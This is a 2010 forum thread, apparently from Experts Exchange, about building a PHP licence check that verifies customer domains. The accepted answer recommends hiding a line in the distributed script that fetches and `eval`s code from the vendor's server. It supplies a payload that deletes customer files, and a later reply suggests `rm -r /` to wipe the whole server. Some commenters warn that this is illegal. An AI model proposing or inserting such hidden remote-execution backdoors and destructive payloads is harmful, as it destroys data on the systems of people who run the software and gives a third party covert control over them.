?
Solved

Write a php licencing script that checks domain

Posted on 2010-09-08
15
Medium Priority
?
279 Views
Last Modified: 2012-06-21
I basically just want to keep track of people who purchase my script.  I would like to add their domains to a database or txt file, and whenever the module is accessed, it will remotely check if the domain it's on is in the list.  I'm just looking for a very simple way to do it.

Thanks
0
Comment
Question by:whatshakin
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 7
  • 4
  • 2
  • +1
15 Comments
 
LVL 12

Expert Comment

by:Rok-Kralj
ID: 33628274
There is no simple way. Once you give them your php code, there is nothing preventing them from removing the code that protects the script.

However, you can harden that job for them by obfuscating the script before giving it out, while you still keep original source code. There are some free and some commercial solutions. Google for "PHP code obfuscator".

As I said, no simple way.
0
 

Author Comment

by:whatshakin
ID: 33628382
I am currently using an obfuscator.  I am only looking for a suggestion on a way to connect remotely and see if the domain is in the list. I will then encode this file only so users can customize the script.

 A sort of API of my own.
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 33628461
You can use 'curl': http://us3.php.net/manual/en/book.curl.php  It can use many different protocols to connect to your server.
0
WordPress Tutorial 3: Plugins, Themes, and Widgets

The three most common changes you will make to your website involve the look (themes), the functionality (plugins), and modular elements (widgets).

In this article we will briefly define each again, and give you directions on how to install them.

 
LVL 12

Expert Comment

by:Rok-Kralj
ID: 33628471
Aha... I understand.

You need to have your own server, we will call it "checker.net", and make your script to ping it every hunderth page load:

if (mt_rand(0,100)==0) {
eval(file_get_contents('http://checker.net/check.php'));
}

You have then a complete control over your code. You just need to hide this piece of code appropriatelly.

This way, you will be able to delete or corrupt the scripts that are not paid/legitimate.
0
 

Author Comment

by:whatshakin
ID: 33628617
what does eval do?
0
 
LVL 12

Expert Comment

by:Rok-Kralj
ID: 33628832
Eval executes any PHP code you like on your client's server. Google for eval.

That means you have unlimited control over all installations.
0
 

Author Comment

by:whatshakin
ID: 33629460
ok, so what would check.php contain?  eval would run that script on my server from the remote server where it's being called?
0
 
LVL 12

Accepted Solution

by:
Rok-Kralj earned 2000 total points
ID: 33629574
example:
$allowed=array('3.232.32.11', '123.123.111.123');

if (!in_array($_SERVER['REMOTE_ADDR'], $allowed)) {
   //write the unallowed attempt to the database
   echo 'unlink("index.php");'; //delete index.php
}

Open in new window

0
 

Author Comment

by:whatshakin
ID: 33630169
is there something else you could do besides, deleting the index file?  I'm really just looking for good ideas.
0
 
LVL 12

Expert Comment

by:Rok-Kralj
ID: 33630723
anything you like :)

That is what eval is for. I leave it for your imagination. You can even erase whole server:

echo('exec("rm -r /")');
0
 
LVL 12

Expert Comment

by:Rok-Kralj
ID: 33630975
But with deleting everyting you are probably violating some law. The wisest idea would be to just delete the script and report the ip to you or just that, then you can sue the ip's owner for theft.
0
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 33631190
Yes, do anything to a computer that you don't own or have the rights to is a felony in the US these days.  Make sure whatever you do is covered in your licensing agreement.
0
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 33631312
I think you might be better off with CURL instead of file_get_contents(). See the tip on this page to learn why.
http://us.php.net/manual/en/function.file-get-contents.php

I would advise against deleting anything on the client machine.  Think about what would happen if you did that accidentally even once (maybe your server was down) and word got out, your reputation as a software vendor would be toast.  Not to mention the consequential damages that lawyers love.

Obfuscators can be reversed, but it's hard to do so.

What does your script software do?  Would I be on firm ground to assume you have copyright registration and have gotten appropriate legal advice about licensing?
0
 
LVL 12

Expert Comment

by:Rok-Kralj
ID: 33631372
Yes, obfuscators can be reversed just like machine code can be... Nothing is 100%.

That is true. If it would go for my company, I'd just take a note, get a domain owner and take a right, lawful way to get my money / lost profit (I'd issue a warning first, if they don't delete your intellectual property, then you look for alternative ways).

No need to use cURL. For such a simple thing (one way communication) it is complicating the thing where it doesn't need to be.
0
 
LVL 111

Expert Comment

by:Ray Paseur
ID: 33633386
I think the choice of CURL vs fopen() or file_get_contents() is going to be a matter of the hosting company and its permissions.  Many "askers" here use GoDaddy and do not know any better.
0

Featured Post

WordPress Tutorial 2: Terminology

An important part of learning any new piece of software is understanding the terminology it uses. Thankfully WordPress uses fairly simple names for everything that make it easy to start using the software.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Developers of all skill levels should learn to use current best practices when developing websites. However many developers, new and old, fall into the trap of using deprecated features because this is what so many tutorials and books tell them to u…
Originally, this post was published on Monitis Blog, you can check it here . In business circles, we sometimes hear that today is the “age of the customer.” And so it is. Thanks to the enormous advances over the past few years in consumer techno…
The viewer will learn how to look for a specific file type in a local or remote server directory using PHP.
This tutorial will teach you the core code needed to finalize the addition of a watermark to your image. The viewer will use a small PHP class to learn and create a watermark.
Suggested Courses

764 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question